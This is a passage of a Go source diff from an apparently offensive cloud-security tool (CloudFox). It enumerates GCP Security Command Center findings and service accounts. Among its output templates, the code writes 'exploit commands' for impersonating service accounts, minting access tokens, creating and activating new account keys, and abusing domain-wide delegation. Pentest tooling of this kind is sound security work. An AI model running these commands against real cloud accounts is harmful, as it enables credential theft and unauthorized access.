finding.ResourceName, + Description: finding.Description, + ExternalURI: finding.ExternalUri, + } + + // Parse severity + if finding.Severity != securitycenterpb.Finding_SEVERITY_UNSPECIFIED { + sccFinding.Severity = finding.Severity.String() + } else { + sccFinding.Severity = "UNSPECIFIED" + } + + // Parse resource type from resource name + if finding.ResourceName != "" { + parts := strings.Split(finding.ResourceName, "/") + if len(parts) >= 2 { + sccFinding.ResourceType = parts[len(parts)-2] + } + } + + // Get create time + if finding.CreateTime != 
nil { + sccFinding.CreateTime = finding.CreateTime.AsTime().Format("2006-01-02 15:04:05") + } + + // Parse source display name from finding name + if finding.Name != "" { + // Format: organizations/{org}/sources/{source}/findings/{finding} + // or projects/{project}/sources/{source}/findings/{finding} + parts := strings.Split(finding.Name, "/") + for i, part := range parts { + if part == "sources" && i+1 < len(parts) { + sccFinding.SourceDisplayName = parts[i+1] + break + } + } + } + + return sccFinding +} + +// severityRank returns a numeric rank for severity comparison +func severityRank(severity string) int { + switch severity { + case "CRITICAL": + return 4 + case "HIGH": + return 3 + case "MEDIUM": + return 2 + case "LOW": + return 1 + default: + return 0 + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID string) { + // Only add CRITICAL and HIGH severity findings to loot + if finding.Severity != "CRITICAL" && finding.Severity != "HIGH" { + return + } + + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# FINDING: %s (%s)\n"+ + "# =============================================================================\n"+ + "# Category: %s\n"+ + "# Resource: %s\n"+ + "# Project: %s\n", + finding.Name, finding.Severity, + finding.Category, + finding.ResourceName, + projectID, + ) + + if finding.Description != "" { + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf("# Description: %s\n", finding.Description) + } + + if finding.ExternalURI != "" { + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf("# Console URL: %s\n", finding.ExternalURI) + } + + // Add gcloud commands + m.LootMap[projectID]["security-center-commands"].Contents += "\n# === ENUMERATION COMMANDS ===\n\n" + 
m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( + "# View finding details:\n"+ + "gcloud scc findings list --source=\"-\" --project=%s --filter=\"name:\\\"%s\\\"\"\n\n", + projectID, finding.Name, + ) + + // Add specific commands based on category + m.LootMap[projectID]["security-center-commands"].Contents += "# === REMEDIATION COMMANDS ===\n\n" + categoryLower := strings.ToLower(finding.Category) + switch { + case strings.Contains(categoryLower, "public_bucket"): + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( + "# Remove public access:\n"+ + "gsutil iam ch -d allUsers:objectViewer %s\n"+ + "gsutil iam ch -d allAuthenticatedUsers:objectViewer %s\n\n", + finding.ResourceName, + finding.ResourceName, + ) + case strings.Contains(categoryLower, "firewall"): + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( + "# Review firewall rule:\n"+ + "gcloud compute firewall-rules describe %s --project=%s\n\n", + finding.ResourceName, + projectID, + ) + case strings.Contains(categoryLower, "service_account_key"): + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( + "# List service account keys:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s\n\n", + finding.ResourceName, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *SecurityCenterModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + pathBuilder := m.BuildPathBuilder() + + // Build per-project output data + projectLevelData := make(map[string]internal.CloudfoxOutput) + + for projectID, findings := range m.ProjectFindings { + // Sort findings by severity + sort.Slice(findings, func(i, j int) bool 
{ + return severityRank(findings[i].Severity) > severityRank(findings[j].Severity) + }) + + // Main findings table + findingsHeader := []string{ + "Severity", + "Category", + "Resource", + "Resource Type", + "State", + "Created", + "External URI", + } + + var findingsBody [][]string + for _, f := range findings { + resourceType := f.ResourceType + if resourceType == "" { + resourceType = "-" + } + externalURI := f.ExternalURI + if externalURI == "" { + externalURI = "-" + } + + findingsBody = append(findingsBody, []string{ + f.Severity, + f.Category, + f.ResourceName, + resourceType, + f.State, + f.CreateTime, + externalURI, + }) + } + + // Assets table for this project + assetsHeader := []string{ + "Resource", + "Resource Type", + "Finding Count", + "Max Severity", + } + + var assetsBody [][]string + if projectAssets, ok := m.ProjectAssets[projectID]; ok { + for _, asset := range projectAssets { + resourceType := asset.ResourceType + if resourceType == "" { + resourceType = "-" + } + + assetsBody = append(assetsBody, []string{ + asset.ResourceName, + resourceType, + fmt.Sprintf("%d", asset.FindingCount), + asset.Severity, + }) + } + } + + // Sort assets by finding count + sort.Slice(assetsBody, func(i, j int) bool { + return assetsBody[i][2] > assetsBody[j][2] + }) + + // Collect loot files for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "scc-findings", + Header: findingsHeader, + Body: findingsBody, + }, + } + + // Add assets table if any + if len(assetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "scc-assets", + Header: assetsHeader, + Body: assetsBody, + }) + } + + projectLevelData[projectID] = SecurityCenterOutput{ + 
Table: tables, + Loot: lootFiles, + } + } + + outputData := internal.HierarchicalOutputData{ + ProjectLevelData: projectLevelData, + } + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_SECURITYCENTER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *SecurityCenterModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allFindings := m.getAllFindings() + allAssets := m.getAllAssets() + + // Sort findings by severity + sort.Slice(allFindings, func(i, j int) bool { + return severityRank(allFindings[i].Severity) > severityRank(allFindings[j].Severity) + }) + + // Main findings table + findingsHeader := []string{ + "Project Name", + "Project ID", + "Severity", + "Category", + "Resource", + "Resource Type", + "State", + "Created", + "External URI", + } + + var findingsBody [][]string + for _, f := range allFindings { + resourceType := f.ResourceType + if resourceType == "" { + resourceType = "-" + } + externalURI := f.ExternalURI + if externalURI == "" { + externalURI = "-" + } + + findingsBody = append(findingsBody, []string{ + m.GetProjectName(f.ProjectID), + f.ProjectID, + f.Severity, + f.Category, + f.ResourceName, + resourceType, + f.State, + f.CreateTime, + externalURI, + }) + } + + // Assets table + assetsHeader := []string{ + "Project Name", + "Project ID", + "Resource", + "Resource Type", + "Finding Count", + "Max Severity", + } + + var assetsBody [][]string + for _, asset := range allAssets { + resourceType := asset.ResourceType + if resourceType == "" { + resourceType = "-" + } + + assetsBody = append(assetsBody, []string{ + m.GetProjectName(asset.ProjectID), + asset.ProjectID, + asset.ResourceName, + resourceType, + fmt.Sprintf("%d", asset.FindingCount), + asset.Severity, + }) + } + + // Sort assets by finding count + sort.Slice(assetsBody, func(i, j int) bool { + return 
assetsBody[i][4] > assetsBody[j][4] + }) + + // Collect all loot files - only include if they have content beyond the header + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "scc-findings", + Header: findingsHeader, + Body: findingsBody, + }, + } + + // Add assets table if any + if len(assetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "scc-assets", + Header: assetsHeader, + Body: assetsBody, + }) + } + + output := SecurityCenterOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_SECURITYCENTER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go new file mode 100644 index 00000000..660c63d2 --- /dev/null +++ b/gcp/commands/serviceaccounts.go @@ -0,0 +1,738 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPServiceAccountsCommand = &cobra.Command{ + Use: globals.GCP_SERVICEACCOUNTS_MODULE_NAME, + Aliases: []string{"sa", "sas", 
"service-accounts"}, + Short: "Enumerate GCP service accounts with security analysis", + Long: `Enumerate GCP service accounts with detailed security analysis. + +Features: +- Lists all service accounts with metadata +- Analyzes user-managed keys (age, expiration) +- Identifies default service accounts (Compute, App Engine, etc.) +- Detects disabled service accounts +- Flags service accounts without key rotation +- Identifies impersonation opportunities + +Column Descriptions: +- Impersonation Type: The type of access a principal has TO this service account + (TokenCreator=can generate access tokens, KeyAdmin=can create keys, + ActAs=can attach SA to resources, SAAdmin=full admin, SignBlob/SignJwt=can sign as SA) +- Impersonator: The principal (user/SA/group) who has that impersonation capability`, + Run: runGCPServiceAccountsCommand, +} + +// ServiceAccountAnalysis extends ServiceAccountInfo with security analysis +type ServiceAccountAnalysis struct { + IAMService.ServiceAccountInfo + IsDefaultSA bool + DefaultSAType string // "compute", "appengine", "cloudbuild", etc. 
+ OldestKeyAge int // Days + HasExpiredKeys bool + HasOldKeys bool // Keys older than 90 days + // Pentest: Impersonation analysis + ImpersonationInfo *IAMService.SAImpersonationInfo +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type ServiceAccountsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectServiceAccounts map[string][]ServiceAccountAnalysis // projectID -> service accounts + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + SARolesCache map[string]map[string][]string // projectID -> saEmail -> roles + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type ServiceAccountsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ServiceAccountsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ServiceAccountsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPServiceAccountsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &ServiceAccountsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectServiceAccounts: make(map[string][]ServiceAccountAnalysis), + LootMap: make(map[string]map[string]*internal.LootFile), + SARolesCache: make(map[string]map[string][]string), + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// 
------------------------------ +func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } + + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, m.processProject) + + // Get all service accounts for stats + allSAs := m.getAllServiceAccounts() + + // Check results + if len(allSAs) == 0 { + logger.InfoM("No service accounts found", globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + return + } + + // Count findings + withKeys := 0 + defaultSAs := 0 + impersonatable := 0 + for _, sa := range allSAs { + if sa.HasKeys { + withKeys++ + } + if sa.IsDefaultSA { + defaultSAs++ + } + if sa.ImpersonationInfo != nil && (len(sa.ImpersonationInfo.TokenCreators) > 0 || len(sa.ImpersonationInfo.KeyCreators) > 0) { + impersonatable++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d service account(s) (%d with keys, %d default, %d impersonatable)", + len(allSAs), withKeys, defaultSAs, impersonatable), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// getAllServiceAccounts returns all service accounts from all projects +func (m *ServiceAccountsModule) getAllServiceAccounts() []ServiceAccountAnalysis { + var all []ServiceAccountAnalysis + for _, sas := range m.ProjectServiceAccounts { + all = append(all, sas...) 
+ } + return all +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *ServiceAccountsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating service accounts in project: %s", projectID), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } + + // Create service and fetch service accounts with impersonation analysis + iamService := IAMService.New() + serviceAccounts, err := iamService.ServiceAccountsWithImpersonation(projectID) + if err != nil { + // Fallback to basic enumeration if impersonation analysis fails + serviceAccounts, err = iamService.ServiceAccounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate service accounts in project %s", projectID)) + return + } + } + + // Get impersonation info for each SA + impersonationMap := make(map[string]*IAMService.SAImpersonationInfo) + impersonationInfos, err := iamService.GetAllServiceAccountImpersonation(projectID) + if err == nil { + for i := range impersonationInfos { + impersonationMap[impersonationInfos[i].ServiceAccount] = &impersonationInfos[i] + } + } + + // Get roles for each service account (best effort) + saRoles := make(map[string][]string) + for _, sa := range serviceAccounts { + roles, err := iamService.GetRolesForServiceAccount(projectID, sa.Email) + if err == nil { + saRoles[sa.Email] = roles + } + // Silently skip if we can't get roles - user may not have IAM permissions + } + + // Analyze each service account + var analyzedSAs []ServiceAccountAnalysis + for _, sa := range serviceAccounts { + analyzed := m.analyzeServiceAccount(sa, projectID) + // Attach impersonation info if available + if info, ok := impersonationMap[sa.Email]; ok { + analyzed.ImpersonationInfo = 
info + } + // Attach roles if available + if roles, ok := saRoles[sa.Email]; ok { + analyzed.Roles = roles + } + analyzedSAs = append(analyzedSAs, analyzed) + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectServiceAccounts[projectID] = analyzedSAs + m.SARolesCache[projectID] = saRoles + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["serviceaccounts-commands"] = &internal.LootFile{ + Name: "serviceaccounts-commands", + Contents: "# Service Account Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: iam-commands/iam-enumeration for IAM policy analysis and high-privilege role flags\n\n", + } + } + + // Generate loot for each service account + for _, sa := range analyzedSAs { + m.addServiceAccountToLoot(projectID, sa) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service account(s) in project %s", len(analyzedSAs), projectID), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } +} + +// analyzeServiceAccount performs security analysis on a service account +func (m *ServiceAccountsModule) analyzeServiceAccount(sa IAMService.ServiceAccountInfo, projectID string) ServiceAccountAnalysis { + analyzed := ServiceAccountAnalysis{ + ServiceAccountInfo: sa, + } + + // Check if it's a default service account + analyzed.IsDefaultSA, analyzed.DefaultSAType = isDefaultServiceAccount(sa.Email, projectID) + + // Analyze keys + if len(sa.Keys) > 0 { + now := time.Now() + oldestAge := 0 + + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + // Calculate key age + keyAge := int(now.Sub(key.ValidAfter).Hours() / 24) + if keyAge > oldestAge { + oldestAge = keyAge + } + + // Check for expired keys + if !key.ValidBefore.IsZero() && now.After(key.ValidBefore) { + analyzed.HasExpiredKeys = true + } + + // Check for old keys (> 90 days) + if 
keyAge > 90 { + analyzed.HasOldKeys = true + } + } + } + + analyzed.OldestKeyAge = oldestAge + } + + return analyzed +} + +// isDefaultServiceAccount checks if a service account is a GCP default service account +func isDefaultServiceAccount(email, projectID string) (bool, string) { + // Compute Engine default service account + if strings.HasSuffix(email, "-compute@developer.gserviceaccount.com") { + return true, "Compute Engine" + } + + // App Engine default service account + if strings.HasSuffix(email, "@appspot.gserviceaccount.com") { + return true, "App Engine" + } + + // Cloud Build service account + if strings.Contains(email, "@cloudbuild.gserviceaccount.com") { + return true, "Cloud Build" + } + + // Cloud Functions service account (project-id@appspot.gserviceaccount.com) + if email == fmt.Sprintf("%s@appspot.gserviceaccount.com", projectID) { + return true, "App Engine/Functions" + } + + // Dataflow service account + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + // This is also used by Dataflow + return true, "Compute/Dataflow" + } + + // GKE service account + if strings.Contains(email, "@container-engine-robot.iam.gserviceaccount.com") { + return true, "GKE" + } + + // Cloud SQL service account + if strings.Contains(email, "@gcp-sa-cloud-sql.iam.gserviceaccount.com") { + return true, "Cloud SQL" + } + + // Pub/Sub service account + if strings.Contains(email, "@gcp-sa-pubsub.iam.gserviceaccount.com") { + return true, "Pub/Sub" + } + + // Firebase service accounts + if strings.Contains(email, "@firebase.iam.gserviceaccount.com") { + return true, "Firebase" + } + + // Google APIs service account + if strings.Contains(email, "@cloudservices.gserviceaccount.com") { + return true, "Google APIs" + } + + return false, "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ServiceAccountsModule) addServiceAccountToLoot(projectID string, sa ServiceAccountAnalysis) { + lootFile := 
m.LootMap[projectID]["serviceaccounts-commands"] + if lootFile == nil { + return + } + + keyFileName := strings.Split(sa.Email, "@")[0] + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SERVICE ACCOUNT: %s\n"+ + "# =============================================================================\n", + sa.Email, + ) + + if sa.DisplayName != "" { + lootFile.Contents += fmt.Sprintf("# Display Name: %s\n", sa.DisplayName) + } + if sa.Disabled { + lootFile.Contents += "# DISABLED\n" + } + if sa.IsDefaultSA { + lootFile.Contents += fmt.Sprintf("# Default SA: %s\n", sa.DefaultSAType) + } + if sa.OAuth2ClientID != "" { + lootFile.Contents += fmt.Sprintf("# DWD Enabled (Client ID: %s)\n", sa.OAuth2ClientID) + } + + // Add key summary - only show if keys exist + userKeyCount := 0 + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + userKeyCount++ + } + } + if userKeyCount > 0 { + lootFile.Contents += fmt.Sprintf("# User Managed Keys: %d\n", userKeyCount) + } + if sa.OldestKeyAge > 90 { + lootFile.Contents += fmt.Sprintf("# WARNING: Key older than 90 days (%d days)\n", sa.OldestKeyAge) + } + + // Add impersonation info if available + if sa.ImpersonationInfo != nil { + if len(sa.ImpersonationInfo.TokenCreators) > 0 { + lootFile.Contents += fmt.Sprintf("# Token Creators: %s\n", strings.Join(sa.ImpersonationInfo.TokenCreators, ", ")) + } + if len(sa.ImpersonationInfo.KeyCreators) > 0 { + lootFile.Contents += fmt.Sprintf("# Key Creators: %s\n", strings.Join(sa.ImpersonationInfo.KeyCreators, ", ")) + } + if len(sa.ImpersonationInfo.ActAsUsers) > 0 { + lootFile.Contents += fmt.Sprintf("# ActAs Users: %s\n", strings.Join(sa.ImpersonationInfo.ActAsUsers, ", ")) + } + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe service account +gcloud iam service-accounts describe %s --project=%s --format=json | jq '{email: .email, displayName: .displayName, 
disabled: .disabled, oauth2ClientId: .oauth2ClientId}' + +# List all keys with creation dates and expiration +gcloud iam service-accounts keys list --iam-account=%s --project=%s --format=json | jq -r '.[] | {keyId: .name | split("/") | last, keyType: .keyType, created: .validAfterTime, expires: .validBeforeTime}' + +# Get IAM policy - who can impersonate this SA +gcloud iam service-accounts get-iam-policy %s --project=%s --format=json | jq '.bindings[] | {role: .role, members: .members}' + +# Check project-level IAM bindings for this SA +gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains("%s")) | {role: .role, member: "%s"}' + +# Check what resources this SA can access +gcloud asset search-all-iam-policies --scope=projects/%s --query='policy:%s' --format=json | jq -r '.results[] | {resource: .resource, roles: [.policy.bindings[].role]}' + +`, sa.Email, projectID, + sa.Email, projectID, + sa.Email, projectID, + projectID, sa.Email, sa.Email, + projectID, sa.Email) + + lootFile.Contents += fmt.Sprintf(`# === EXPLOIT COMMANDS === + +# Impersonate SA - get access token +gcloud auth print-access-token --impersonate-service-account=%s + +# Impersonate SA - get identity token (for Cloud Run/Functions) +gcloud auth print-identity-token --impersonate-service-account=%s + +# Create a new key for this SA (requires iam.serviceAccountKeys.create) +gcloud iam service-accounts keys create %s-key.json --iam-account=%s --project=%s + +# Activate the downloaded key +gcloud auth activate-service-account --key-file=%s-key.json + +# Test impersonation - list projects as this SA +gcloud projects list --impersonate-service-account=%s + +`, sa.Email, sa.Email, keyFileName, sa.Email, projectID, keyFileName, sa.Email) + + // Add DWD exploitation if enabled + if sa.OAuth2ClientID != "" { + lootFile.Contents += fmt.Sprintf(`# === DOMAIN-WIDE DELEGATION EXPLOITATION === +# This SA has DWD enabled - can impersonate Workspace users! 
+# OAuth2 Client ID: %s + +# Run the domain-wide-delegation module for detailed exploitation: +# cloudfox gcp domain-wide-delegation -p %s + +# Quick test - requires SA key and target Workspace user email: +# python dwd_exploit.py --key-file %s-key.json --subject admin@domain.com --all-scopes + +`, sa.OAuth2ClientID, projectID, keyFileName) + } + + lootFile.Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getTableHeader returns the header for service accounts table +// Columns are grouped logically: +// - Identity: Project, Email, Display Name, Disabled, Default SA +// - Keys: User Managed Keys, Google Managed Keys, Oldest Key Age +// - Permissions: DWD, Roles, SA Attack Paths +// - Impersonation: IAM Binding Role, IAM Binding Principal +func (m *ServiceAccountsModule) getTableHeader() []string { + return []string{ + // Identity + "Project", + "Email", + "Display Name", + "Disabled", + "Default SA", + // Keys + "User Managed Keys", + "Google Managed Keys", + "Oldest Key Age", + // Permissions + "DWD", + "Roles", + "SA Attack Paths", + // Impersonation + "IAM Binding Role", + "IAM Binding Principal", + } +} + +// serviceAccountsToTableBody converts service accounts to table body rows +func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []ServiceAccountAnalysis) [][]string { + var body [][]string + for _, sa := range serviceAccounts { + disabled := "No" + if sa.Disabled { + disabled = "Yes" + } + + defaultSA := "No" + if sa.IsDefaultSA { + defaultSA = sa.DefaultSAType + } + + // Check if DWD is enabled + dwd := "No" + if sa.OAuth2ClientID != "" { + dwd = "Yes" + } + + // Check attack paths (privesc/exfil/lateral) for this service account + // FoxMapper 
takes priority if available (graph-based analysis) + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa.Email) + + // Count keys by type and find oldest key age + userKeyCount := 0 + googleKeyCount := 0 + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + userKeyCount++ + } else if key.KeyType == "SYSTEM_MANAGED" { + googleKeyCount++ + } + } + userKeys := "-" + if userKeyCount > 0 { + userKeys = fmt.Sprintf("%d", userKeyCount) + } + googleKeys := "-" + if googleKeyCount > 0 { + googleKeys = fmt.Sprintf("%d", googleKeyCount) + } + + // Format oldest key age + oldestKeyAge := "-" + if sa.OldestKeyAge > 0 { + if sa.OldestKeyAge > 365 { + oldestKeyAge = fmt.Sprintf("%dy %dd", sa.OldestKeyAge/365, sa.OldestKeyAge%365) + } else { + oldestKeyAge = fmt.Sprintf("%dd", sa.OldestKeyAge) + } + // Add warning indicator for old keys + if sa.OldestKeyAge > 90 { + oldestKeyAge += " ⚠" + } + } + + // Format roles for display + rolesDisplay := IAMService.FormatRolesShort(sa.Roles) + + // Build IAM bindings from impersonation info + // Row order: Identity (Project, Email, Display Name, Disabled, Default SA), + // Keys (User Managed Keys, Google Managed Keys, Oldest Key Age), + // Permissions (DWD, Roles, SA Attack Paths), + // Impersonation (IAM Binding Role, IAM Binding Principal) + hasBindings := false + if sa.ImpersonationInfo != nil { + for _, member := range sa.ImpersonationInfo.TokenCreators { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "TokenCreator", member, + }) + } + } + for _, member := range sa.ImpersonationInfo.KeyCreators { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, 
sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "KeyAdmin", member, + }) + } + } + for _, member := range sa.ImpersonationInfo.ActAsUsers { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "ActAs", member, + }) + } + } + for _, member := range sa.ImpersonationInfo.SAAdmins { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "SAAdmin", member, + }) + } + } + for _, member := range sa.ImpersonationInfo.SignBlobUsers { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "SignBlob", member, + }) + } + } + for _, member := range sa.ImpersonationInfo.SignJwtUsers { + email := extractEmailFromMember(member) + if email != sa.Email { + hasBindings = true + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "SignJwt", member, + }) + } + } + } + + if !hasBindings { + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "-", "-", + }) + } + } + return body +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *ServiceAccountsModule) writeHierarchicalOutput(ctx 
context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, sas := range m.ProjectServiceAccounts { + body := m.serviceAccountsToTableBody(sas) + tableFiles := []internal.TableFile{{ + Name: "serviceaccounts", + Header: m.getTableHeader(), + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ServiceAccountsOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *ServiceAccountsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allSAs := m.getAllServiceAccounts() + body := m.serviceAccountsToTableBody(allSAs) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{ + Name: "serviceaccounts", + Header: m.getTableHeader(), + Body: body, + }} + + output := ServiceAccountsOutput{Table: tables, Loot: lootFiles} + + 
